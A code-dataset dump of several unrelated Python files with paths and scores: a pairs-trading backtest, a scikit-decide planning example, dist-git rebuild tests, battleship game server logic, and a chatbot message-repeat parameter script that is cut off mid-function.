pair_correlation_trading_strategy['symbol2_sell'][i] = s2price
position=1
elif not position and symbol1_sell[i]!=0:
pair_correlation_trading_strategy['symbol1_sell'][i] = s1price
pair_correlation_trading_strategy['symbol2_buy'][i] = s2price
position = -1
elif position==-1 and (symbol1_sell[i]==0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_buy'][i] = s1price
pair_correlation_trading_strategy['symbol2_sell'][i] = s2price
position = 0
elif position==1 and (symbol1_buy[i] == 0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_sell'][i] = s1price
pair_correlation_trading_strategy['symbol2_buy'][i] = s2price
position = 0
Symbol2_prices.plot()
symbol2_buy[zscore(ratios)<1] = 0
symbol2_sell[zscore(ratios)>-1] = 0
symbol2_buy.plot(color="g", linestyle="None", marker="^")
symbol2_sell.plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,Symbol1_prices.min(),Symbol2_prices.max()))
plt.legend(["Symbol1", "Buy Signal", "Sell Signal","Symbol2"])
plt.show()
Symbol1_prices.plot()
pair_correlation_trading_strategy['symbol1_buy'].plot(color="g", linestyle="None", marker="^")
pair_correlation_trading_strategy['symbol1_sell'].plot(color="r", linestyle="None", marker="v")
Symbol2_prices.plot()
pair_correlation_trading_strategy['symbol2_buy'].plot(color="g", linestyle="None", marker="^")
pair_correlation_trading_strategy['symbol2_sell'].plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,Symbol1_prices.min(),Symbol2_prices.max()))
plt.legend(["Symbol1", "Buy Signal", "Sell Signal","Symbol2"])
plt.show()
pair_correlation_trading_strategy['symbol1_buy'].head()
pair_correlation_trading_strategy['symbol1_position']=\
pair_correlation_trading_strategy['symbol1_buy']-pair_correlation_trading_strategy['symbol1_sell']
pair_correlation_trading_strategy['symbol2_position']=\
pair_correlation_trading_strategy['symbol2_buy']-pair_correlation_trading_strategy['symbol2_sell']
pair_correlation_trading_strategy['symbol1_position'].cumsum().plot()
pair_correlation_trading_strategy['symbol2_position'].cumsum().plot()
pair_correlation_trading_strategy['total_position']=\
pair_correlation_trading_strategy['symbol1_position']+pair_correlation_trading_strategy['symbol2_position']
pair_correlation_trading_strategy['total_position'].cumsum().plot()
plt.title("Symbol 1 and Symbol 2 positions")
plt.legend()
plt.show()
pair_correlation_trading_strategy['symbol1_price']=Symbol1_prices
pair_correlation_trading_strategy['symbol1_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol1_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['delta']=np.zeros(len(Symbol1_prices))
position=0
s1_shares = 1000000
for i in range(len(Symbol1_prices)):
s1positions= Symbol1_prices[i] * s1_shares
s2positions= Symbol2_prices[i] * int(s1positions/Symbol2_prices[i])
print(Symbol1_prices[i],Symbol2_prices[i])
delta_position=s1positions-s2positions
if not position and symbol1_buy[i]!=0:
pair_correlation_trading_strategy['symbol1_buy'][i]=s1positions
pair_correlation_trading_strategy['symbol2_sell'][i] = s2positions
pair_correlation_trading_strategy['delta'][i]=delta_position
position=1
elif not position and symbol1_sell[i]!=0:
pair_correlation_trading_strategy['symbol1_sell'][i] = s1positions
pair_correlation_trading_strategy['symbol2_buy'][i] = s2positions
pair_correlation_trading_strategy['delta'][i] = delta_position
position = -1
elif position==-1 and (symbol1_sell[i]==0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_buy'][i] = s1positions
pair_correlation_trading_strategy['symbol2_sell'][i] = s2positions
position = 0
elif position==1 and (symbol1_buy[i] == 0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_sell'][i] = s1positions
pair_correlation_trading_strategy['symbol2_buy'][i] = s2positions
position = 0
pair_correlation_trading_strategy['symbol1_position']=\
pair_correlation_trading_strategy['symbol1_buy']-pair_correlation_trading_strategy['symbol1_sell']
pair_correlation_trading_strategy['symbol2_position']=\
pair_correlation_trading_strategy['symbol2_buy']-pair_correlation_trading_strategy['symbol2_sell']
pair_correlation_trading_strategy['symbol1_position'].cumsum().plot()
pair_correlation_trading_strategy['symbol2_position'].cumsum().plot()
pair_correlation_trading_strategy['total_position']=\
pair_correlation_trading_strategy['symbol1_position']+pair_correlation_trading_strategy['symbol2_position']
pair_correlation_trading_strategy['total_position'].cumsum().plot()
plt.title("Symbol 1 and Symbol 2 positions")
plt.legend()
plt.show()
pair_correlation_trading_strategy['delta'].plot()
plt.title("Delta Position")
plt.show() | Chapter4/ch4_pairs_correlation_real_symbol.py | import numpy as np
import pandas as pd
from statsmodels.tsa.stattools import coint
import matplotlib.pyplot as plt
# Set a seed value to make the experience reproducible
np.random.seed(123)
import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
import numpy as np
import matplotlib.pyplot as plt
from statsmodels.tsa.stattools import coint
import seaborn
from pandas_datareader import data
symbolsIds = ['SPY','AAPL','ADBE','LUV','MSFT','SKYW','QCOM',
'HPQ','JNPR','AMD','IBM']
def load_financial_data(symbols, start_date, end_date,output_file):
try:
df = pd.read_pickle(output_file)
print('File data found...reading symbols data')
except FileNotFoundError:
print('File not found...downloading the symbols data')
df = data.DataReader(symbols, 'yahoo', start_date, end_date)
df.to_pickle(output_file)
return df
data=load_financial_data(symbolsIds,start_date='2001-01-01',
end_date = '2018-01-01',
output_file='multi_data_large.pkl')
Symbol1_prices = data['Adj Close']['MSFT']
Symbol1_prices.plot(figsize=(15,7))
plt.show()
Symbol2_prices = data['Adj Close']['JNPR']
Symbol2_prices.name = 'JNPR'
plt.title("MSFT and JNPR prices")
Symbol1_prices.plot()
Symbol2_prices.plot()
plt.legend()
plt.show()
def zscore(series):
return (series - series.mean()) / np.std(series)
score, pvalue, _ = coint(Symbol1_prices, Symbol2_prices)
print(pvalue)
ratios = Symbol1_prices / Symbol2_prices
plt.title("Ration between Symbol 1 and Symbol 2 price")
ratios.plot()
plt.show()
#plt.axhline(ratios.mean())
#plt.legend([' Ratio'])
zscore(ratios).plot()
plt.title("Z-score evolution")
plt.axhline(zscore(ratios).mean(),color="black")
plt.axhline(1.0, color="red")
plt.axhline(-1.0, color="green")
plt.show()
ratios.plot()
buy = ratios.copy()
sell = ratios.copy()
buy[zscore(ratios)>-1] = 0
sell[zscore(ratios)<1] = 0
buy.plot(color="g", linestyle="None", marker="^")
sell.plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,ratios.min(),ratios.max()))
plt.legend(["Ratio", "Buy Signal", "Sell Signal"])
plt.show()
symbol1_buy=Symbol1_prices.copy()
symbol1_sell=Symbol1_prices.copy()
symbol2_buy=Symbol2_prices.copy()
symbol2_sell=Symbol2_prices.copy()
Symbol1_prices.plot()
symbol1_buy[zscore(ratios)>-1] = 0
symbol1_sell[zscore(ratios)<1] = 0
symbol1_buy.plot(color="g", linestyle="None", marker="^")
symbol1_sell.plot(color="r", linestyle="None", marker="v")
pair_correlation_trading_strategy = pd.DataFrame(index=Symbol1_prices.index)
pair_correlation_trading_strategy['symbol1_price']=Symbol1_prices
pair_correlation_trading_strategy['symbol1_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol1_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_sell']=np.zeros(len(Symbol1_prices))
position=0
for i in range(len(Symbol1_prices)):
s1price=Symbol1_prices[i]
s2price=Symbol2_prices[i]
if not position and symbol1_buy[i]!=0:
pair_correlation_trading_strategy['symbol1_buy'][i]=s1price
pair_correlation_trading_strategy['symbol2_sell'][i] = s2price
position=1
elif not position and symbol1_sell[i]!=0:
pair_correlation_trading_strategy['symbol1_sell'][i] = s1price
pair_correlation_trading_strategy['symbol2_buy'][i] = s2price
position = -1
elif position==-1 and (symbol1_sell[i]==0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_buy'][i] = s1price
pair_correlation_trading_strategy['symbol2_sell'][i] = s2price
position = 0
elif position==1 and (symbol1_buy[i] == 0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_sell'][i] = s1price
pair_correlation_trading_strategy['symbol2_buy'][i] = s2price
position = 0
Symbol2_prices.plot()
symbol2_buy[zscore(ratios)<1] = 0
symbol2_sell[zscore(ratios)>-1] = 0
symbol2_buy.plot(color="g", linestyle="None", marker="^")
symbol2_sell.plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,Symbol1_prices.min(),Symbol2_prices.max()))
plt.legend(["Symbol1", "Buy Signal", "Sell Signal","Symbol2"])
plt.show()
Symbol1_prices.plot()
pair_correlation_trading_strategy['symbol1_buy'].plot(color="g", linestyle="None", marker="^")
pair_correlation_trading_strategy['symbol1_sell'].plot(color="r", linestyle="None", marker="v")
Symbol2_prices.plot()
pair_correlation_trading_strategy['symbol2_buy'].plot(color="g", linestyle="None", marker="^")
pair_correlation_trading_strategy['symbol2_sell'].plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,Symbol1_prices.min(),Symbol2_prices.max()))
plt.legend(["Symbol1", "Buy Signal", "Sell Signal","Symbol2"])
plt.show()
pair_correlation_trading_strategy['symbol1_buy'].head()
pair_correlation_trading_strategy['symbol1_position']=\
pair_correlation_trading_strategy['symbol1_buy']-pair_correlation_trading_strategy['symbol1_sell']
pair_correlation_trading_strategy['symbol2_position']=\
pair_correlation_trading_strategy['symbol2_buy']-pair_correlation_trading_strategy['symbol2_sell']
pair_correlation_trading_strategy['symbol1_position'].cumsum().plot()
pair_correlation_trading_strategy['symbol2_position'].cumsum().plot()
pair_correlation_trading_strategy['total_position']=\
pair_correlation_trading_strategy['symbol1_position']+pair_correlation_trading_strategy['symbol2_position']
pair_correlation_trading_strategy['total_position'].cumsum().plot()
plt.title("Symbol 1 and Symbol 2 positions")
plt.legend()
plt.show()
pair_correlation_trading_strategy['symbol1_price']=Symbol1_prices
pair_correlation_trading_strategy['symbol1_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol1_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['delta']=np.zeros(len(Symbol1_prices))
position=0
s1_shares = 1000000
for i in range(len(Symbol1_prices)):
s1positions= Symbol1_prices[i] * s1_shares
s2positions= Symbol2_prices[i] * int(s1positions/Symbol2_prices[i])
print(Symbol1_prices[i],Symbol2_prices[i])
delta_position=s1positions-s2positions
if not position and symbol1_buy[i]!=0:
pair_correlation_trading_strategy['symbol1_buy'][i]=s1positions
pair_correlation_trading_strategy['symbol2_sell'][i] = s2positions
pair_correlation_trading_strategy['delta'][i]=delta_position
position=1
elif not position and symbol1_sell[i]!=0:
pair_correlation_trading_strategy['symbol1_sell'][i] = s1positions
pair_correlation_trading_strategy['symbol2_buy'][i] = s2positions
pair_correlation_trading_strategy['delta'][i] = delta_position
position = -1
elif position==-1 and (symbol1_sell[i]==0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_buy'][i] = s1positions
pair_correlation_trading_strategy['symbol2_sell'][i] = s2positions
position = 0
elif position==1 and (symbol1_buy[i] == 0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_sell'][i] = s1positions
pair_correlation_trading_strategy['symbol2_buy'][i] = s2positions
position = 0
pair_correlation_trading_strategy['symbol1_position']=\
pair_correlation_trading_strategy['symbol1_buy']-pair_correlation_trading_strategy['symbol1_sell']
pair_correlation_trading_strategy['symbol2_position']=\
pair_correlation_trading_strategy['symbol2_buy']-pair_correlation_trading_strategy['symbol2_sell']
pair_correlation_trading_strategy['symbol1_position'].cumsum().plot()
pair_correlation_trading_strategy['symbol2_position'].cumsum().plot()
pair_correlation_trading_strategy['total_position']=\
pair_correlation_trading_strategy['symbol1_position']+pair_correlation_trading_strategy['symbol2_position']
pair_correlation_trading_strategy['total_position'].cumsum().plot()
plt.title("Symbol 1 and Symbol 2 positions")
plt.legend()
plt.show()
pair_correlation_trading_strategy['delta'].plot()
plt.title("Delta Position")
plt.show() | 0.190573 | 0.519582 |
import gym
import numpy as np
from typing import Callable
from skdecide.hub.domain.gym import DeterministicGymDomain, GymWidthDomain, GymDiscreteActionDomain
from skdecide.hub.solver.riw import RIW
from skdecide.utils import rollout
ENV_NAME = 'CartPole-v0'
HORIZON = 200
class D(DeterministicGymDomain, GymWidthDomain, GymDiscreteActionDomain):
pass
class GymRIWDomain(D):
"""This class wraps a cost-based deterministic OpenAI Gym environment as a domain
usable by a width-based planner
!!! warning
Using this class requires OpenAI Gym to be installed.
"""
def __init__(self, gym_env: gym.Env,
set_state: Callable[[gym.Env, D.T_memory[D.T_state]], None] = None,
get_state: Callable[[gym.Env], D.T_memory[D.T_state]] = None,
continuous_feature_fidelity: int = 1,
discretization_factor: int = 10,
branching_factor: int = None,
max_depth: int = 50) -> None:
"""Initialize GymRIWDomain.
# Parameters
gym_env: The deterministic Gym environment (gym.env) to wrap.
set_state: Function to call to set the state of the gym environment.
If None, default behavior is to deepcopy the environment when changing state
get_state: Function to call to get the state of the gym environment.
If None, default behavior is to deepcopy the environment when changing state
continuous_feature_fidelity: Number of integers to represent a continuous feature
in the interval-based feature abstraction (higher is more precise)
discretization_factor: Number of discretized action variable values per continuous action variable
branching_factor: if not None, sample branching_factor actions from the resulting list of discretized actions
max_depth: maximum depth of states to explore from the initial state
"""
DeterministicGymDomain.__init__(self,
gym_env=gym_env,
set_state=set_state,
get_state=get_state)
GymDiscreteActionDomain.__init__(self,
discretization_factor=discretization_factor,
branching_factor=branching_factor)
GymWidthDomain.__init__(self, continuous_feature_fidelity=continuous_feature_fidelity)
gym_env._max_episode_steps = max_depth
domain_factory = lambda: GymRIWDomain(gym_env=gym.make(ENV_NAME),
continuous_feature_fidelity=5,
discretization_factor=3,
max_depth=HORIZON)
domain = domain_factory()
domain.reset()
if RIW.check_domain(domain):
solver_factory = lambda: RIW(domain_factory=domain_factory,
state_features=lambda d, s: d.bee2_features(s),
use_state_feature_hash=False,
use_simulation_domain=True,
time_budget=200,
rollout_budget=1000,
max_depth=200,
exploration=0.25,
parallel=False,
debug_logs=False)
with solver_factory() as solver:
GymRIWDomain.solve_with(solver, domain_factory)
initial_state = solver._domain.reset()
rollout(domain, solver, from_memory=initial_state, num_episodes=1, max_steps=HORIZON-1, max_framerate=30,
outcome_formatter=lambda o: f'{o.observation} - cost: {o.value.cost:.2f}') | examples/riw_gym_solver.py |
import gym
import numpy as np
from typing import Callable
from skdecide.hub.domain.gym import DeterministicGymDomain, GymWidthDomain, GymDiscreteActionDomain
from skdecide.hub.solver.riw import RIW
from skdecide.utils import rollout
ENV_NAME = 'CartPole-v0'
HORIZON = 200
class D(DeterministicGymDomain, GymWidthDomain, GymDiscreteActionDomain):
pass
class GymRIWDomain(D):
"""This class wraps a cost-based deterministic OpenAI Gym environment as a domain
usable by a width-based planner
!!! warning
Using this class requires OpenAI Gym to be installed.
"""
def __init__(self, gym_env: gym.Env,
set_state: Callable[[gym.Env, D.T_memory[D.T_state]], None] = None,
get_state: Callable[[gym.Env], D.T_memory[D.T_state]] = None,
continuous_feature_fidelity: int = 1,
discretization_factor: int = 10,
branching_factor: int = None,
max_depth: int = 50) -> None:
"""Initialize GymRIWDomain.
# Parameters
gym_env: The deterministic Gym environment (gym.env) to wrap.
set_state: Function to call to set the state of the gym environment.
If None, default behavior is to deepcopy the environment when changing state
get_state: Function to call to get the state of the gym environment.
If None, default behavior is to deepcopy the environment when changing state
continuous_feature_fidelity: Number of integers to represent a continuous feature
in the interval-based feature abstraction (higher is more precise)
discretization_factor: Number of discretized action variable values per continuous action variable
branching_factor: if not None, sample branching_factor actions from the resulting list of discretized actions
max_depth: maximum depth of states to explore from the initial state
"""
DeterministicGymDomain.__init__(self,
gym_env=gym_env,
set_state=set_state,
get_state=get_state)
GymDiscreteActionDomain.__init__(self,
discretization_factor=discretization_factor,
branching_factor=branching_factor)
GymWidthDomain.__init__(self, continuous_feature_fidelity=continuous_feature_fidelity)
gym_env._max_episode_steps = max_depth
domain_factory = lambda: GymRIWDomain(gym_env=gym.make(ENV_NAME),
continuous_feature_fidelity=5,
discretization_factor=3,
max_depth=HORIZON)
domain = domain_factory()
domain.reset()
if RIW.check_domain(domain):
solver_factory = lambda: RIW(domain_factory=domain_factory,
state_features=lambda d, s: d.bee2_features(s),
use_state_feature_hash=False,
use_simulation_domain=True,
time_budget=200,
rollout_budget=1000,
max_depth=200,
exploration=0.25,
parallel=False,
debug_logs=False)
with solver_factory() as solver:
GymRIWDomain.solve_with(solver, domain_factory)
initial_state = solver._domain.reset()
rollout(domain, solver, from_memory=initial_state, num_episodes=1, max_steps=HORIZON-1, max_framerate=30,
outcome_formatter=lambda o: f'{o.observation} - cost: {o.value.cost:.2f}') | 0.932615 | 0.487063 |
import os
import pytest
import shutil
from flexmock import flexmock
from pathlib import Path
from container_workflow_tool.cli import ImageRebuilder
class TestDistgit(object):
def setup_method(self):
self.component = 's2i-base'
self.ir = ImageRebuilder('Testing')
self.ir.set_config('default.yaml', release="rawhide")
# Partner BZ testing
self.ir.rebuild_reason = "Unit testing"
self.ir.disable_klist = True
self.ir.set_do_images([self.component])
self.ir._setup_brewapi()
@pytest.mark.distgit
def test_setup_distgit(self):
assert self.ir.distgit is None
self.ir._setup_distgit()
assert self.ir.distgit is not None
@pytest.mark.distgit
def test_pull_downstream(self):
tmp = Path(self.ir._get_tmp_workdir())
self.ir.pull_downstream()
cpath = tmp / self.component
assert cpath.is_dir()
dpath = cpath / 'Dockerfile'
assert dpath.is_file()
shutil.rmtree(tmp / self.component)
@pytest.mark.distgit
def test_pull_upstream(self):
self.ir.pull_upstream()
tmp = self.ir._get_tmp_workdir()
cpath = os.path.join(tmp, 's2i')
assert os.path.isdir(cpath)
dpath = os.path.join(cpath, 'base', 'Dockerfile')
assert os.path.isfile(dpath)
@pytest.mark.distgit
def test_distgit_changes(self):
self.ir.conf["from_tag"] = "test"
tmp = Path(self.ir._get_tmp_workdir())
self.ir.dist_git_changes()
dpath = tmp / self.component / 'Dockerfile'
assert os.path.isfile(dpath)
tag_found = False
with open(dpath) as f:
if ":test" in f.read():
tag_found = True
assert tag_found
shutil.rmtree(tmp / self.component)
@pytest.mark.distgit
def test_distgit_commit_msg(self):
msg = "Unit testing"
self.ir.set_commit_msg(msg)
assert self.ir.distgit.commit_msg == msg
@pytest.mark.distgit
def test_tag_dockerfile(self):
tmp = Path(self.ir._get_tmp_workdir())
self.ir.conf["from_tag"] = "test"
self.ir.dist_git_changes()
cpath = tmp / self.component
dpath = cpath / 'Dockerfile'
found_tag = False
with open(dpath) as f:
if ":test" in f.read():
found_tag = True
assert found_tag
shutil.rmtree(tmp / self.component) | tests/test_distgit.py |
import os
import pytest
import shutil
from flexmock import flexmock
from pathlib import Path
from container_workflow_tool.cli import ImageRebuilder
class TestDistgit(object):
def setup_method(self):
self.component = 's2i-base'
self.ir = ImageRebuilder('Testing')
self.ir.set_config('default.yaml', release="rawhide")
# Partner BZ testing
self.ir.rebuild_reason = "Unit testing"
self.ir.disable_klist = True
self.ir.set_do_images([self.component])
self.ir._setup_brewapi()
@pytest.mark.distgit
def test_setup_distgit(self):
assert self.ir.distgit is None
self.ir._setup_distgit()
assert self.ir.distgit is not None
@pytest.mark.distgit
def test_pull_downstream(self):
tmp = Path(self.ir._get_tmp_workdir())
self.ir.pull_downstream()
cpath = tmp / self.component
assert cpath.is_dir()
dpath = cpath / 'Dockerfile'
assert dpath.is_file()
shutil.rmtree(tmp / self.component)
@pytest.mark.distgit
def test_pull_upstream(self):
self.ir.pull_upstream()
tmp = self.ir._get_tmp_workdir()
cpath = os.path.join(tmp, 's2i')
assert os.path.isdir(cpath)
dpath = os.path.join(cpath, 'base', 'Dockerfile')
assert os.path.isfile(dpath)
@pytest.mark.distgit
def test_distgit_changes(self):
self.ir.conf["from_tag"] = "test"
tmp = Path(self.ir._get_tmp_workdir())
self.ir.dist_git_changes()
dpath = tmp / self.component / 'Dockerfile'
assert os.path.isfile(dpath)
tag_found = False
with open(dpath) as f:
if ":test" in f.read():
tag_found = True
assert tag_found
shutil.rmtree(tmp / self.component)
@pytest.mark.distgit
def test_distgit_commit_msg(self):
msg = "Unit testing"
self.ir.set_commit_msg(msg)
assert self.ir.distgit.commit_msg == msg
@pytest.mark.distgit
def test_tag_dockerfile(self):
tmp = Path(self.ir._get_tmp_workdir())
self.ir.conf["from_tag"] = "test"
self.ir.dist_git_changes()
cpath = tmp / self.component
dpath = cpath / 'Dockerfile'
found_tag = False
with open(dpath) as f:
if ":test" in f.read():
found_tag = True
assert found_tag
shutil.rmtree(tmp / self.component) | 0.326057 | 0.246137 |
import database
import wst
from game.player import Player
from random import randint, choice
abc = 'ABCDEFGHJKLMNPQRSTUVWXYZ123456789'
class Round():
def __init__(self, game_type):
self.type = game_type # 1-random 0-code
self.players_list = []
self.state = 0 # 0-wait for players #1-place (#2-wait_for_second place) #3-game #4-end
self.turn_index = 0
self.shots = 0
self.code = None
if self.type == 0:
self.code = ''
for _ in range(6):
self.code += choice(abc)
async def add_player(self, user):
self.players_list.append(Player(user))
user.set_state(3)
if len(self.players_list) == 2:
await self.start()
else:
await wst.send(user.ws, {'type': 'state', 'data': 0})
async def finish_place(self, player, opponent):
if (self.state != 1 or player.get_placed() or player.board.count_ships()
or player.board.get_ships() != [4, 3, 2, 1]): return
player.placed = True
if opponent.get_placed(): # placing is complete
self.state = 3
self.turn_index = randint(0, 1)
for pl in self.players_list:
await wst.send(pl.user.ws, {'type': 'state', 'data': 3})
await wst.send_turn(self)
else:
await wst.send(player.user.ws, {'type': 'state', 'data': 2})
async def place(self, player, num, state):
if self.state != 1 or player.get_placed() or state not in (0, 1): return
await wst.send(player.user.ws, {"type": 'board', "my": 1, "data": player.board.place(num, state)})
await wst.send(player.user.ws, {'type': 'ships', 'data': player.board.get_ships()})
async def auto_place(self, player):
if self.state != 1 or player.get_placed(): return False
await wst.send(player.user.ws, {"type": 'board', "my": 1, "data": player.board.auto_place()})
await wst.send(player.user.ws, {'type': 'ships', 'data': [4, 3, 2, 1]})
async def shot(self, player, opponent, num):
if player != self.players_list[self.turn_index] or self.state != 3: return
shot_result = opponent.board.shot(num)
if not shot_result: return
self.shots += 1
send_brd, change_turn = shot_result
if change_turn:
if self.turn_index == 1: self.turn_index = 0
else: self.turn_index = 1
await wst.send(player.user.ws, {"type": 'board', "my": 0, "data": send_brd})
await wst.send(opponent.user.ws, {"type": 'board', "my": 1, "data": send_brd})
await wst.send_turn(self)
if opponent.board.count_all() == 0:
self.state = 4
database.game_log(self, opponent, player)
await wst.send(player.user.ws, {'type': 'end', 'data': 1})
await wst.send(opponent.user.ws, {'type': 'end', 'data': 0})
async def start(self):
self.state = 1
self.shots = 0
for player in self.players_list:
player.reset()
player.user.set_state(2)
await wst.send(player.user.ws, {'type': 'state', 'data': 1})
await wst.send(player.user.ws, {'type': 'top', 'data': database.get_top(player.user.get_nickname())})
for opp in self.players_list:
if opp != player:
await wst.send(opp.user.ws, {'type': 'op_nick', 'data': player.user.get_nickname()})
def get_turn(self):
return self.turn_index
def get_state(self):
return self.state
def get_players(self):
return self.players_list
def get_type(self):
return self.type
def get_code(self):
return self.code
def get_shots(self):
return self.shots | server/game/round.py | import database
import wst
from game.player import Player
from random import randint, choice
abc = 'ABCDEFGHJKLMNPQRSTUVWXYZ123456789'
class Round():
def __init__(self, game_type):
self.type = game_type # 1-random 0-code
self.players_list = []
self.state = 0 # 0-wait for players #1-place (#2-wait_for_second place) #3-game #4-end
self.turn_index = 0
self.shots = 0
self.code = None
if self.type == 0:
self.code = ''
for _ in range(6):
self.code += choice(abc)
async def add_player(self, user):
self.players_list.append(Player(user))
user.set_state(3)
if len(self.players_list) == 2:
await self.start()
else:
await wst.send(user.ws, {'type': 'state', 'data': 0})
async def finish_place(self, player, opponent):
if (self.state != 1 or player.get_placed() or player.board.count_ships()
or player.board.get_ships() != [4, 3, 2, 1]): return
player.placed = True
if opponent.get_placed(): # placing is complete
self.state = 3
self.turn_index = randint(0, 1)
for pl in self.players_list:
await wst.send(pl.user.ws, {'type': 'state', 'data': 3})
await wst.send_turn(self)
else:
await wst.send(player.user.ws, {'type': 'state', 'data': 2})
async def place(self, player, num, state):
if self.state != 1 or player.get_placed() or state not in (0, 1): return
await wst.send(player.user.ws, {"type": 'board', "my": 1, "data": player.board.place(num, state)})
await wst.send(player.user.ws, {'type': 'ships', 'data': player.board.get_ships()})
async def auto_place(self, player):
if self.state != 1 or player.get_placed(): return False
await wst.send(player.user.ws, {"type": 'board', "my": 1, "data": player.board.auto_place()})
await wst.send(player.user.ws, {'type': 'ships', 'data': [4, 3, 2, 1]})
async def shot(self, player, opponent, num):
if player != self.players_list[self.turn_index] or self.state != 3: return
shot_result = opponent.board.shot(num)
if not shot_result: return
self.shots += 1
send_brd, change_turn = shot_result
if change_turn:
if self.turn_index == 1: self.turn_index = 0
else: self.turn_index = 1
await wst.send(player.user.ws, {"type": 'board', "my": 0, "data": send_brd})
await wst.send(opponent.user.ws, {"type": 'board', "my": 1, "data": send_brd})
await wst.send_turn(self)
if opponent.board.count_all() == 0:
self.state = 4
database.game_log(self, opponent, player)
await wst.send(player.user.ws, {'type': 'end', 'data': 1})
await wst.send(opponent.user.ws, {'type': 'end', 'data': 0})
async def start(self):
self.state = 1
self.shots = 0
for player in self.players_list:
player.reset()
player.user.set_state(2)
await wst.send(player.user.ws, {'type': 'state', 'data': 1})
await wst.send(player.user.ws, {'type': 'top', 'data': database.get_top(player.user.get_nickname())})
for opp in self.players_list:
if opp != player:
await wst.send(opp.user.ws, {'type': 'op_nick', 'data': player.user.get_nickname()})
def get_turn(self):
return self.turn_index
def get_state(self):
return self.state
def get_players(self):
return self.players_list
def get_type(self):
return self.type
def get_code(self):
return self.code
def get_shots(self):
return self.shots | 0.310904 | 0.271122 |
import codecs
import json
import os
import re
import sys
#---------------------------
# [Required] Script Information
#---------------------------
ScriptName = "Spam Parameter"
Website = "https://www.twitch.tv/EncryptedThoughts"
Description = "Parameter ($spam) to be used in custom commands that will duplicate and spam the input message to chat. See readme.txt for use instructions."
Creator = "EncryptedThoughts"
Version = "1.0.0.0"
#---------------------------
# Define Global Variables
#---------------------------
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
ReadMe = os.path.join(os.path.dirname(__file__), "README.txt")
#---------------------------------------
# Classes
#---------------------------------------
class Settings(object):
def __init__(self, SettingsFile=None):
if SettingsFile and os.path.isfile(SettingsFile):
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
else:
self.EnableDebug = True
def Reload(self, jsondata):
self.__dict__ = json.loads(jsondata, encoding="utf-8")
return
def Save(self, SettingsFile):
try:
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8")
with codecs.open(SettingsFile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8')))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
return
#---------------------------
# [Required] Initialize Data (Only called on load)
#---------------------------
def Init():
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
ScriptSettings.Save(SettingsFile)
return
#---------------------------
# [Optional] Reload Settings (Called when a user clicks the Save Settings button in the Chatbot UI)
#---------------------------
def ReloadSettings(jsonData):
# Execute json reloading here
ScriptSettings.__dict__ = json.loads(jsonData)
ScriptSettings.Save(SettingsFile)
return
#---------------------------
# [Required] Execute Data / Process messages
#---------------------------
def Execute(data):
return
#---------------------------
# [Required] Tick method (Gets called during every iteration even when there is no incoming data)
#---------------------------
def Tick():
return
#---------------------------
# [Optional] Parse method (Allows you to create your own custom $parameters)
#---------------------------
def Parse(parseString, userid, username, targetid, targetname, message):
regex = "\$spam\(\s*(discord|stream)\s*,\s*[0-9]+\s*,\s*[0-9]+\s*,\s*(true|false)\s*,.*\)" # !spam(string,number,number,bool,string)
item = re.search(regex, parseString)
if item is None:
return parseString
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Oh boy! Spam parameter detected: " + item.group())
rawArguments = item.group().strip()[6:][:-1]
args = rawArguments.split(",")
chatType = args[0]
spamCount = int(args[1])
maxLength = int(args[2])
allowPartialMessage = args[3]
inputMessage = ""
#allow , in final parameter in case the message needs to contain one
currentArg = 4
while currentArg < len(args):
if currentArg > 4:
inputMessage += ","
inputMessage += args[currentArg]
currentArg += 1
if chatType == "stream" and maxLength > 400:
maxLength = 400
if chatType == "discord" and maxLength > 1795:
maxLength = 1795
spam = ""
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Vomits Info -> chatType: " + chatType + " spamCount: " + str(spamCount) + " maxLength: " + str(maxLength) + " allowPartialMessage: " + str(allowPartialMessage) + " inputMessage: " + inputMessage)
while len(spam) <= maxLength:
if allowPartialMessage == "false" and (len(spam) + len(inputMessage) + 1) > maxLength:
break
spam += " " + inputMessage
if len(spam) > maxLength:
spam = spam[:maxLength - len(SpamText)]
parseString = parseString.replace(item.group(), spam)
if ScriptSettings.EnableDebug:
